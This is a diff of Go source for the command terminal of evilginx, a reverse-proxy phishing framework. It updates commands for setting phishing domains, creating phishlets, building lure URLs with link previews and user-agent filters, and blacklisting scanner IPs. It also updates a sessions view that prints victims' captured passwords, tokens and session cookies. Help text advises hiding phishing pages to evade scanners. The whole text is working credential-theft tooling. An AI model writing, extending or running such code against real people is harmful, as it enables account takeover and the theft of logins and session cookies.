||||
case "domain":
|
||||
t.cfg.SetBaseDomain(args[1])
|
||||
t.cfg.ResetAllSites()
|
||||
t.manageCertificates(false)
|
||||
return nil
|
||||
case "ip":
|
||||
case "ipv4":
|
||||
t.cfg.SetServerIP(args[1])
|
||||
return nil
|
||||
case "redirect_key":
|
||||
t.cfg.SetRedirectParam(args[1])
|
||||
log.Warning("you need to regenerate your phishing urls after this change")
|
||||
return nil
|
||||
case "verification_key":
|
||||
t.cfg.SetVerificationParam(args[1])
|
||||
log.Warning("you need to regenerate your phishing urls after this change")
|
||||
return nil
|
||||
case "verification_token":
|
||||
t.cfg.SetVerificationToken(args[1])
|
||||
log.Warning("you need to regenerate your phishing urls after this change")
|
||||
return nil
|
||||
case "redirect_url":
|
||||
if len(args[1]) > 0 {
|
||||
_, err := url.ParseRequestURI(args[1])
|
||||
@ -230,7 +213,10 @@ func (t *Terminal) handleBlacklist(args []string) error {
|
||||
pn := len(args)
|
||||
if pn == 0 {
|
||||
mode := t.cfg.GetBlacklistMode()
|
||||
ip_num, mask_num := t.p.bl.GetStats()
|
||||
log.Info("blacklist mode set to: %s", mode)
|
||||
log.Info("blacklist: loaded %d ip addresses and %d ip masks", ip_num, mask_num)
|
||||
|
||||
return nil
|
||||
} else if pn == 1 {
|
||||
switch args[0] {
|
||||
@ -240,10 +226,27 @@ func (t *Terminal) handleBlacklist(args []string) error {
|
||||
case "unauth":
|
||||
t.cfg.SetBlacklistMode(args[0])
|
||||
return nil
|
||||
case "noadd":
|
||||
t.cfg.SetBlacklistMode(args[0])
|
||||
return nil
|
||||
case "off":
|
||||
t.cfg.SetBlacklistMode(args[0])
|
||||
return nil
|
||||
}
|
||||
} else if pn == 2 {
|
||||
switch args[0] {
|
||||
case "log":
|
||||
switch args[1] {
|
||||
case "on":
|
||||
t.p.bl.SetVerbose(true)
|
||||
log.Info("blacklist log output: enabled")
|
||||
return nil
|
||||
case "off":
|
||||
t.p.bl.SetVerbose(false)
|
||||
log.Info("blacklist log output: disabled")
|
||||
return nil
|
||||
}
|
||||
}
|
||||
}
|
||||
return fmt.Errorf("invalid syntax: %s", args)
|
||||
}
|
||||
@ -252,18 +255,18 @@ func (t *Terminal) handleProxy(args []string) error {
|
||||
pn := len(args)
|
||||
if pn == 0 {
|
||||
var proxy_enabled string = "no"
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
proxy_enabled = "yes"
|
||||
}
|
||||
|
||||
keys := []string{"enabled", "type", "address", "port", "username", "password"}
|
||||
vals := []string{proxy_enabled, t.cfg.proxyType, t.cfg.proxyAddress, strconv.Itoa(t.cfg.proxyPort), t.cfg.proxyUsername, t.cfg.proxyPassword}
|
||||
vals := []string{proxy_enabled, t.cfg.proxyConfig.Type, t.cfg.proxyConfig.Address, strconv.Itoa(t.cfg.proxyConfig.Port), t.cfg.proxyConfig.Username, t.cfg.proxyConfig.Password}
|
||||
log.Printf("\n%s\n", AsRows(keys, vals))
|
||||
return nil
|
||||
} else if pn == 1 {
|
||||
switch args[0] {
|
||||
case "enable":
|
||||
err := t.p.setProxy(true, t.p.cfg.proxyType, t.p.cfg.proxyAddress, t.p.cfg.proxyPort, t.p.cfg.proxyUsername, t.p.cfg.proxyPassword)
|
||||
err := t.p.setProxy(true, t.p.cfg.proxyConfig.Type, t.p.cfg.proxyConfig.Address, t.p.cfg.proxyConfig.Port, t.p.cfg.proxyConfig.Username, t.p.cfg.proxyConfig.Password)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -271,7 +274,7 @@ func (t *Terminal) handleProxy(args []string) error {
|
||||
log.Important("you need to restart evilginx for the changes to take effect!")
|
||||
return nil
|
||||
case "disable":
|
||||
err := t.p.setProxy(false, t.p.cfg.proxyType, t.p.cfg.proxyAddress, t.p.cfg.proxyPort, t.p.cfg.proxyUsername, t.p.cfg.proxyPassword)
|
||||
err := t.p.setProxy(false, t.p.cfg.proxyConfig.Type, t.p.cfg.proxyConfig.Address, t.p.cfg.proxyConfig.Port, t.p.cfg.proxyConfig.Username, t.p.cfg.proxyConfig.Password)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -281,19 +284,19 @@ func (t *Terminal) handleProxy(args []string) error {
|
||||
} else if pn == 2 {
|
||||
switch args[0] {
|
||||
case "type":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
t.cfg.SetProxyType(args[1])
|
||||
return nil
|
||||
case "address":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
t.cfg.SetProxyAddress(args[1])
|
||||
return nil
|
||||
case "port":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
port, err := strconv.Atoi(args[1])
|
||||
@ -303,13 +306,13 @@ func (t *Terminal) handleProxy(args []string) error {
|
||||
t.cfg.SetProxyPort(port)
|
||||
return nil
|
||||
case "username":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
t.cfg.SetProxyUsername(args[1])
|
||||
return nil
|
||||
case "password":
|
||||
if t.cfg.proxyEnabled {
|
||||
if t.cfg.proxyConfig.Enabled {
|
||||
return fmt.Errorf("please disable the proxy before making changes to its configuration")
|
||||
}
|
||||
t.cfg.SetProxyPassword(args[1])
|
||||
@ -324,8 +327,10 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
dgray := color.New(color.FgHiBlack)
|
||||
lgreen := color.New(color.FgHiGreen)
|
||||
yellow := color.New(color.FgYellow)
|
||||
lyellow := color.New(color.FgHiYellow)
|
||||
lred := color.New(color.FgHiRed)
|
||||
cyan := color.New(color.FgCyan)
|
||||
white := color.New(color.FgHiWhite)
|
||||
|
||||
pn := len(args)
|
||||
if pn == 0 {
|
||||
@ -341,7 +346,7 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
var rows [][]string
|
||||
for _, s := range sessions {
|
||||
tcol := dgray.Sprintf("none")
|
||||
if len(s.Tokens) > 0 {
|
||||
if len(s.CookieTokens) > 0 || len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 {
|
||||
tcol = lgreen.Sprintf("captured")
|
||||
}
|
||||
row := []string{strconv.Itoa(s.Id), lred.Sprintf(s.Phishlet), lblue.Sprintf(truncateString(s.Username, 24)), lblue.Sprintf(truncateString(s.Password, 24)), tcol, yellow.Sprintf(s.RemoteAddr), time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04")}
|
||||
@ -373,13 +378,13 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
|
||||
s_found = true
|
||||
tcol := dgray.Sprintf("empty")
|
||||
if len(s.Tokens) > 0 {
|
||||
if len(s.CookieTokens) > 0 || len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 {
|
||||
tcol = lgreen.Sprintf("captured")
|
||||
}
|
||||
|
||||
keys := []string{"id", "phishlet", "username", "password", "tokens", "landing url", "user-agent", "remote ip", "create time", "update time"}
|
||||
vals := []string{strconv.Itoa(s.Id), lred.Sprint(s.Phishlet), lblue.Sprint(s.Username), lblue.Sprint(s.Password), tcol, yellow.Sprint(s.LandingURL), dgray.Sprint(s.UserAgent), yellow.Sprint(s.RemoteAddr), dgray.Sprint(time.Unix(s.CreateTime, 0).Format("2006-01-02 15:04")), dgray.Sprint(time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04"))}
|
||||
log.Printf("\n%s", AsRows(keys, vals))
|
||||
log.Printf("\n%s\n", AsRows(keys, vals))
|
||||
|
||||
if len(s.Custom) > 0 {
|
||||
var ckeys []string = []string{"custom", "value"}
|
||||
@ -387,14 +392,31 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
for k, v := range s.Custom {
|
||||
cvals = append(cvals, []string{dgray.Sprint(k), cyan.Sprint(v)})
|
||||
}
|
||||
log.Printf("\n%s", AsTable(ckeys, cvals))
|
||||
log.Printf("%s\n", AsTable(ckeys, cvals))
|
||||
}
|
||||
|
||||
if len(s.Tokens) > 0 {
|
||||
json_tokens := t.tokensToJSON(pl, s.Tokens)
|
||||
t.output("%s\n", json_tokens)
|
||||
} else {
|
||||
t.output("\n")
|
||||
if len(s.CookieTokens) > 0 || len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 {
|
||||
if len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 {
|
||||
//var str_tokens string
|
||||
|
||||
tkeys := []string{}
|
||||
tvals := []string{}
|
||||
|
||||
for k, v := range s.BodyTokens {
|
||||
tkeys = append(tkeys, k)
|
||||
tvals = append(tvals, white.Sprint(v))
|
||||
}
|
||||
for k, v := range s.HttpTokens {
|
||||
tkeys = append(tkeys, k)
|
||||
tvals = append(tvals, white.Sprint(v))
|
||||
}
|
||||
|
||||
log.Printf("[ %s ]\n%s\n", lgreen.Sprint("tokens"), AsRows(tkeys, tvals))
|
||||
}
|
||||
if len(s.CookieTokens) > 0 {
|
||||
json_tokens := t.cookieTokensToJSON(pl, s.CookieTokens)
|
||||
log.Printf("[ %s ]\n%s\n\n", lyellow.Sprint("cookies"), json_tokens)
|
||||
}
|
||||
}
|
||||
break
|
||||
}
|
||||
@ -473,32 +495,85 @@ func (t *Terminal) handleSessions(args []string) error {
|
||||
func (t *Terminal) handlePhishlets(args []string) error {
|
||||
pn := len(args)
|
||||
|
||||
if pn == 0 {
|
||||
if pn >= 3 && args[0] == "create" {
|
||||
pl, err := t.cfg.GetPhishlet(args[1])
|
||||
if err == nil {
|
||||
params := make(map[string]string)
|
||||
|
||||
var create_ok bool = true
|
||||
if pl.isTemplate {
|
||||
for n := 3; n < pn; n++ {
|
||||
val := args[n]
|
||||
|
||||
sp := strings.Index(val, "=")
|
||||
if sp == -1 {
|
||||
return fmt.Errorf("set custom parameters for the child phishlet using format 'param1=value1 param2=value2'")
|
||||
}
|
||||
k := val[:sp]
|
||||
v := val[sp+1:]
|
||||
|
||||
params[k] = v
|
||||
|
||||
log.Info("adding parameter: %s='%s'", k, v)
|
||||
}
|
||||
}
|
||||
|
||||
if create_ok {
|
||||
child_name := args[1] + ":" + args[2]
|
||||
err := t.cfg.AddSubPhishlet(child_name, args[1], params)
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
} else {
|
||||
t.cfg.SaveSubPhishlets()
|
||||
log.Info("created child phishlet: %s", child_name)
|
||||
}
|
||||
}
|
||||
return nil
|
||||
} else {
|
||||
log.Error("%v", err)
|
||||
}
|
||||
} else if pn == 0 {
|
||||
t.output("%s", t.sprintPhishletStatus(""))
|
||||
return nil
|
||||
} else if pn == 1 {
|
||||
_, err := t.cfg.GetPhishlet(args[0])
|
||||
if err == nil {
|
||||
t.output("%s", t.sprintPhishletStatus(args[0]))
|
||||
return nil
|
||||
}
|
||||
} else if pn == 2 {
|
||||
switch args[0] {
|
||||
case "delete":
|
||||
err := t.cfg.DeleteSubPhishlet(args[1])
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
return nil
|
||||
}
|
||||
t.cfg.SaveSubPhishlets()
|
||||
log.Info("deleted child phishlet: %s", args[1])
|
||||
return nil
|
||||
case "enable":
|
||||
_, err := t.cfg.GetPhishlet(args[1])
|
||||
pl, err := t.cfg.GetPhishlet(args[1])
|
||||
if err != nil {
|
||||
log.Error("%v", err)
|
||||
break
|
||||
}
|
||||
domain, _ := t.cfg.GetSiteDomain(args[1])
|
||||
if domain == "" {
|
||||
return fmt.Errorf("you need to set hostname for phishlet '%s', first. type: phishlet hostname %s your.hostame.domain.com", args[1], args[1])
|
||||
if pl.isTemplate {
|
||||
return fmt.Errorf("phishlet '%s' is a template - you have to 'create' child phishlet from it, with predefined parameters, before you can enable it.", args[1])
|
||||
}
|
||||
err = t.cfg.SetSiteEnabled(args[1])
|
||||
if err != nil {
|
||||
t.cfg.SetSiteDisabled(args[1])
|
||||
return err
|
||||
}
|
||||
t.updatePhishletCertificates(args[1])
|
||||
t.manageCertificates(true)
|
||||
return nil
|
||||
case "disable":
|
||||
err := t.cfg.SetSiteDisabled(args[1])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
t.manageCertificates(false)
|
||||
return nil
|
||||
case "hide":
|
||||
err := t.cfg.SetSiteHidden(args[1], true)
|
||||
@ -512,19 +587,17 @@ func (t *Terminal) handlePhishlets(args []string) error {
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
case "get-url":
|
||||
return fmt.Errorf("incorrect number of arguments")
|
||||
case "get-hosts":
|
||||
pl, err := t.cfg.GetPhishlet(args[1])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Site)
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Name)
|
||||
if !ok || len(bhost) == 0 {
|
||||
return fmt.Errorf("no hostname set for phishlet '%s'", pl.Name)
|
||||
}
|
||||
out := ""
|
||||
hosts := pl.GetPhishHosts()
|
||||
hosts := pl.GetPhishHosts(false)
|
||||
for n, h := range hosts {
|
||||
if n > 0 {
|
||||
out += "\n"
|
||||
@ -543,34 +616,9 @@ func (t *Terminal) handlePhishlets(args []string) error {
|
||||
}
|
||||
if ok := t.cfg.SetSiteHostname(args[1], args[2]); ok {
|
||||
t.cfg.SetSiteDisabled(args[1])
|
||||
t.manageCertificates(false)
|
||||
}
|
||||
return nil
|
||||
case "get-url":
|
||||
pl, err := t.cfg.GetPhishlet(args[1])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Site)
|
||||
if !ok || len(bhost) == 0 {
|
||||
return fmt.Errorf("no hostname set for phishlet '%s'", pl.Name)
|
||||
}
|
||||
urls, err := pl.GetLandingUrls(args[2], true)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
out := ""
|
||||
n := 0
|
||||
hblue := color.New(color.FgHiCyan)
|
||||
for _, u := range urls {
|
||||
if n > 0 {
|
||||
out += "\n"
|
||||
}
|
||||
out += hblue.Sprint(u)
|
||||
n += 1
|
||||
}
|
||||
log.Warning("`get-url` is deprecated - please use `lures` with custom `path` instead")
|
||||
t.output("%s\n", out)
|
||||
return nil
|
||||
}
|
||||
}
|
||||
return fmt.Errorf("invalid syntax: %s", args)
|
||||
@ -624,7 +672,7 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
if err != nil {
|
||||
return fmt.Errorf("get-url: %v", err)
|
||||
}
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Site)
|
||||
bhost, ok := t.cfg.GetSiteDomain(pl.Name)
|
||||
if !ok || len(bhost) == 0 {
|
||||
return fmt.Errorf("no hostname set for phishlet '%s'", pl.Name)
|
||||
}
|
||||
@ -747,19 +795,17 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
if val != "" {
|
||||
val = strings.ToLower(val)
|
||||
|
||||
if val != t.cfg.baseDomain && !strings.HasSuffix(val, "."+t.cfg.baseDomain) {
|
||||
return fmt.Errorf("edit: lure hostname must end with the base domain '%s'", t.cfg.baseDomain)
|
||||
if val != t.cfg.general.Domain && !strings.HasSuffix(val, "."+t.cfg.general.Domain) {
|
||||
return fmt.Errorf("edit: lure hostname must end with the base domain '%s'", t.cfg.general.Domain)
|
||||
}
|
||||
host_re := regexp.MustCompile(`^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$`)
|
||||
if !host_re.MatchString(val) {
|
||||
return fmt.Errorf("edit: invalid hostname")
|
||||
}
|
||||
err = t.updateHostCertificate(val)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
l.Hostname = val
|
||||
t.cfg.refreshActiveHostnames()
|
||||
t.manageCertificates(true)
|
||||
} else {
|
||||
l.Hostname = ""
|
||||
}
|
||||
@ -845,24 +891,24 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
}
|
||||
do_update = true
|
||||
log.Info("og_url = '%s'", l.OgUrl)
|
||||
case "template":
|
||||
case "redirector":
|
||||
if val != "" {
|
||||
path := val
|
||||
if !filepath.IsAbs(val) {
|
||||
templates_dir := t.cfg.GetTemplatesDir()
|
||||
path = filepath.Join(templates_dir, val)
|
||||
redirectors_dir := t.cfg.GetRedirectorsDir()
|
||||
path = filepath.Join(redirectors_dir, val)
|
||||
}
|
||||
|
||||
if _, err := os.Stat(path); !os.IsNotExist(err) {
|
||||
l.Template = val
|
||||
l.Redirector = val
|
||||
} else {
|
||||
return fmt.Errorf("edit: template file does not exist: %s", path)
|
||||
return fmt.Errorf("edit: redirector directory does not exist: %s", path)
|
||||
}
|
||||
} else {
|
||||
l.Template = ""
|
||||
l.Redirector = ""
|
||||
}
|
||||
do_update = true
|
||||
log.Info("template = '%s'", l.Template)
|
||||
log.Info("redirector = '%s'", l.Redirector)
|
||||
case "ua_filter":
|
||||
if val != "" {
|
||||
if _, err := regexp.Compile(val); err != nil {
|
||||
@ -893,7 +939,7 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
}
|
||||
if args[1] == "all" {
|
||||
di := []int{}
|
||||
for n, _ := range t.cfg.lures {
|
||||
for n := range t.cfg.lures {
|
||||
di = append(di, n)
|
||||
}
|
||||
if len(di) > 0 {
|
||||
@ -949,8 +995,8 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
return err
|
||||
}
|
||||
|
||||
keys := []string{"phishlet", "hostname", "path", "template", "ua_filter", "redirect_url", "info", "og_title", "og_desc", "og_image", "og_url"}
|
||||
vals := []string{hiblue.Sprint(l.Phishlet), cyan.Sprint(l.Hostname), hcyan.Sprint(l.Path), white.Sprint(l.Template), green.Sprint(l.UserAgentFilter), yellow.Sprint(l.RedirectUrl), l.Info, dgray.Sprint(l.OgTitle), dgray.Sprint(l.OgDescription), dgray.Sprint(l.OgImageUrl), dgray.Sprint(l.OgUrl)}
|
||||
keys := []string{"phishlet", "hostname", "path", "redirector", "ua_filter", "redirect_url", "info", "og_title", "og_desc", "og_image", "og_url"}
|
||||
vals := []string{hiblue.Sprint(l.Phishlet), cyan.Sprint(l.Hostname), hcyan.Sprint(l.Path), white.Sprint(l.Redirector), green.Sprint(l.UserAgentFilter), yellow.Sprint(l.RedirectUrl), l.Info, dgray.Sprint(l.OgTitle), dgray.Sprint(l.OgDescription), dgray.Sprint(l.OgImageUrl), dgray.Sprint(l.OgUrl)}
|
||||
log.Printf("\n%s\n", AsRows(keys, vals))
|
||||
|
||||
return nil
|
||||
@ -963,13 +1009,10 @@ func (t *Terminal) handleLures(args []string) error {
|
||||
func (t *Terminal) createHelp() {
|
||||
h, _ := NewHelp()
|
||||
h.AddCommand("config", "general", "manage general configuration", "Shows values of all configuration variables and allows to change them.", LAYER_TOP,
|
||||
readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ip"), readline.PcItem("redirect_key"), readline.PcItem("verification_key"), readline.PcItem("verification_token"), readline.PcItem("redirect_url")))
|
||||
readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ipv4"), readline.PcItem("redirect_url")))
|
||||
h.AddSubCommand("config", nil, "", "show all configuration variables")
|
||||
h.AddSubCommand("config", []string{"domain"}, "domain <domain>", "set base domain for all phishlets (e.g. evilsite.com)")
|
||||
h.AddSubCommand("config", []string{"ip"}, "ip <ip_address>", "set ip address of the current server")
|
||||
h.AddSubCommand("config", []string{"redirect_key"}, "redirect_key <name>", "change name of the redirect parameter in phishing url (phishing urls will need to be regenerated)")
|
||||
h.AddSubCommand("config", []string{"verification_key"}, "verification_key <name>", "change name of the verification parameter in phishing url (phishing urls will need to be regenerated)")
|
||||
h.AddSubCommand("config", []string{"verification_token"}, "verification_token <token>", "change the value of the verification token (phishing urls will need to be regenerated)")
|
||||
h.AddSubCommand("config", []string{"ipv4"}, "ipv4 <ip_address>", "set ipv4 external address of the current server")
|
||||
h.AddSubCommand("config", []string{"redirect_url"}, "redirect_url <url>", "change the url where all unauthorized requests will be redirected to (phishing urls will need to be regenerated)")
|
||||
|
||||
h.AddCommand("proxy", "general", "manage proxy configuration", "Configures proxy which will be used to proxy the connection to remote website", LAYER_TOP,
|
||||
@ -984,16 +1027,19 @@ func (t *Terminal) createHelp() {
|
||||
h.AddSubCommand("proxy", []string{"password"}, "password <password>", "set proxy authentication password")
|
||||
|
||||
h.AddCommand("phishlets", "general", "manage phishlets configuration", "Shows status of all available phishlets and allows to change their parameters and enabled status.", LAYER_TOP,
|
||||
readline.PcItem("phishlets", readline.PcItem("hostname", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("enable", readline.PcItemDynamic(t.phishletPrefixCompleter)),
|
||||
readline.PcItem("phishlets", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("delete", readline.PcItemDynamic(t.phishletPrefixCompleter)),
|
||||
readline.PcItem("hostname", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("enable", readline.PcItemDynamic(t.phishletPrefixCompleter)),
|
||||
readline.PcItem("disable", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("hide", readline.PcItemDynamic(t.phishletPrefixCompleter)),
|
||||
readline.PcItem("unhide", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-hosts", readline.PcItemDynamic(t.phishletPrefixCompleter))))
|
||||
readline.PcItem("unhide", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-hosts", readline.PcItemDynamic(t.phishletPrefixCompleter))))
|
||||
h.AddSubCommand("phishlets", nil, "", "show status of all available phishlets")
|
||||
h.AddSubCommand("phishlets", nil, "<phishlet>", "show details of a specific phishlets")
|
||||
h.AddSubCommand("phishlets", []string{"create"}, "create <phishlet> <child_name> <key1=value1> <key2=value2>", "create child phishlet from a template phishlet with custom parameters")
|
||||
h.AddSubCommand("phishlets", []string{"delete"}, "delete <phishlet>", "delete child phishlet")
|
||||
h.AddSubCommand("phishlets", []string{"hostname"}, "hostname <phishlet> <hostname>", "set hostname for given phishlet (e.g. this.is.not.a.phishing.site.evilsite.com)")
|
||||
h.AddSubCommand("phishlets", []string{"enable"}, "enable <phishlet>", "enables phishlet and requests ssl/tls certificate if needed")
|
||||
h.AddSubCommand("phishlets", []string{"disable"}, "disable <phishlet>", "disables phishlet")
|
||||
h.AddSubCommand("phishlets", []string{"hide"}, "hide <phishlet>", "hides the phishing page, logging and redirecting all requests to it (good for avoiding scanners when sending out phishing links)")
|
||||
h.AddSubCommand("phishlets", []string{"unhide"}, "unhide <phishlet>", "makes the phishing page available and reachable from the outside")
|
||||
h.AddSubCommand("phishlets", []string{"get-url"}, "get-url <phishlet> <redirect_url>", "generates phishing url with redirection on successful authentication")
|
||||
h.AddSubCommand("phishlets", []string{"get-hosts"}, "get-hosts <phishlet>", "generates entries for hosts file in order to use localhost for testing")
|
||||
|
||||
h.AddCommand("sessions", "general", "manage sessions and captured tokens with credentials", "Shows all captured credentials and authentication tokens. Allows to view full history of visits and delete logged sessions.", LAYER_TOP,
|
||||
@ -1004,11 +1050,8 @@ func (t *Terminal) createHelp() {
|
||||
h.AddSubCommand("sessions", []string{"delete", "all"}, "delete all", "delete all logged sessions")
|
||||
|
||||
h.AddCommand("lures", "general", "manage lures for generation of phishing urls", "Shows all create lures and allows to edit or delete them.", LAYER_TOP,
|
||||
/* readline.PcItem("lures", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url"),
|
||||
readline.PcItem("edit", readline.PcItem("hostname"), readline.PcItem("path"), readline.PcItem("redirect_url"), readline.PcItem("phishlet"), readline.PcItem("info"), readline.PcItem("og_title"), readline.PcItem("og_desc"), readline.PcItem("og_image"), readline.PcItem("og_url"), readline.PcItem("params"), readline.PcItem("template", readline.PcItemDynamic(t.emptyPrefixCompleter, readline.PcItemDynamic(t.templatesPrefixCompleter)))),
|
||||
readline.PcItem("delete", readline.PcItem("all"))))*/
|
||||
readline.PcItem("lures", readline.PcItem("create", readline.PcItemDynamic(t.phishletPrefixCompleter)), readline.PcItem("get-url"),
|
||||
readline.PcItem("edit", readline.PcItemDynamic(t.luresIdPrefixCompleter, readline.PcItem("hostname"), readline.PcItem("path"), readline.PcItem("redirect_url"), readline.PcItem("phishlet"), readline.PcItem("info"), readline.PcItem("og_title"), readline.PcItem("og_desc"), readline.PcItem("og_image"), readline.PcItem("og_url"), readline.PcItem("params"), readline.PcItem("ua_filter"), readline.PcItem("template", readline.PcItemDynamic(t.templatesPrefixCompleter)))),
|
||||
readline.PcItem("edit", readline.PcItemDynamic(t.luresIdPrefixCompleter, readline.PcItem("hostname"), readline.PcItem("path"), readline.PcItem("redirect_url"), readline.PcItem("phishlet"), readline.PcItem("info"), readline.PcItem("og_title"), readline.PcItem("og_desc"), readline.PcItem("og_image"), readline.PcItem("og_url"), readline.PcItem("params"), readline.PcItem("ua_filter"), readline.PcItem("redirector", readline.PcItemDynamic(t.redirectorsPrefixCompleter)))),
|
||||
readline.PcItem("delete", readline.PcItem("all"))))
|
||||
|
||||
h.AddSubCommand("lures", nil, "", "show all create lures")
|
||||
@ -1020,7 +1063,7 @@ func (t *Terminal) createHelp() {
|
||||
h.AddSubCommand("lures", []string{"get-url"}, "get-url <id> import <params_file> export <urls_file> <text|csv|json>", "generates phishing urls, importing parameters from <import_path> file and exporting them to <export_path>")
|
||||
h.AddSubCommand("lures", []string{"edit", "hostname"}, "edit <id> hostname <hostname>", "sets custom phishing <hostname> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "path"}, "edit <id> path <path>", "sets custom url <path> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "template"}, "edit <id> template <path>", "sets an html template <path> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "redirector"}, "edit <id> redirector <path>", "sets an html redirector directory <path> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "ua_filter"}, "edit <id> ua_filter <regexp>", "sets a regular expression user-agent whitelist filter <regexp> for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "redirect_url"}, "edit <id> redirect_url <redirect_url>", "sets redirect url that user will be navigated to on successful authorization, for a lure with a given <id>")
|
||||
h.AddSubCommand("lures", []string{"edit", "phishlet"}, "edit <id> phishlet <phishlet>", "change the phishlet, the lure with a given <id> applies to")
|
||||
@ -1031,12 +1074,17 @@ func (t *Terminal) createHelp() {
|
||||
h.AddSubCommand("lures", []string{"edit", "og_url"}, "edit <id> og_url <title>", "sets opengraph url that will be shown in link preview, for a lure with a given <id>")
|
||||
|
||||
h.AddCommand("blacklist", "general", "manage automatic blacklisting of requesting ip addresses", "Select what kind of requests should result in requesting IP addresses to be blacklisted.", LAYER_TOP,
|
||||
readline.PcItem("blacklist", readline.PcItem("all"), readline.PcItem("unauth"), readline.PcItem("off")))
|
||||
readline.PcItem("blacklist", readline.PcItem("all"), readline.PcItem("unauth"), readline.PcItem("noadd"), readline.PcItem("off"), readline.PcItem("log", readline.PcItem("on"), readline.PcItem("off"))))
|
||||
|
||||
h.AddSubCommand("blacklist", nil, "", "show current blacklisting mode")
|
||||
h.AddSubCommand("blacklist", []string{"all"}, "all", "block and blacklist ip addresses for every single request (even authorized ones!)")
|
||||
h.AddSubCommand("blacklist", []string{"unauth"}, "unauth", "block and blacklist ip addresses only for unauthorized requests")
|
||||
h.AddSubCommand("blacklist", []string{"off"}, "off", "never add any ip addresses to blacklist")
|
||||
h.AddSubCommand("blacklist", []string{"noadd"}, "noadd", "block but do not add new ip addresses to blacklist")
|
||||
h.AddSubCommand("blacklist", []string{"off"}, "off", "ignore blacklist and allow every request to go through")
|
||||
h.AddSubCommand("blacklist", []string{"log"}, "log <on|off>", "enable or disable log output for blacklist messages")
|
||||
|
||||
h.AddCommand("test-certs", "general", "test TLS certificates for active phishlets", "Test availability of set up TLS certificates for active phishlets.", LAYER_TOP,
|
||||
readline.PcItem("test-certs"))
|
||||
|
||||
h.AddCommand("clear", "general", "clears the screen", "Clears the screen.", LAYER_TOP,
|
||||
readline.PcItem("clear"))
|
||||
@ -1044,7 +1092,7 @@ func (t *Terminal) createHelp() {
|
||||
t.hlp = h
|
||||
}
|
||||
|
||||
func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]map[string]*database.Token) string {
|
||||
func (t *Terminal) cookieTokensToJSON(pl *Phishlet, tokens map[string]map[string]*database.CookieToken) string {
|
||||
type Cookie struct {
|
||||
Path string `json:"path"`
|
||||
Domain string `json:"domain"`
|
||||
@ -1083,104 +1131,118 @@ func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]map[string]*data
|
||||
return string(json)
|
||||
}
|
||||
|
||||
func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]string) string {
|
||||
var ret string
|
||||
white := color.New(color.FgHiWhite)
|
||||
for k, v := range tokens {
|
||||
ret += fmt.Sprintf("%s: %s\n", k, white.Sprint(v))
|
||||
}
|
||||
return ret
|
||||
}
|
||||
|
||||
func (t *Terminal) checkStatus() {
|
||||
if t.cfg.GetBaseDomain() == "" {
|
||||
log.Warning("server domain not set! type: config domain <domain>")
|
||||
}
|
||||
if t.cfg.GetServerIP() == "" {
|
||||
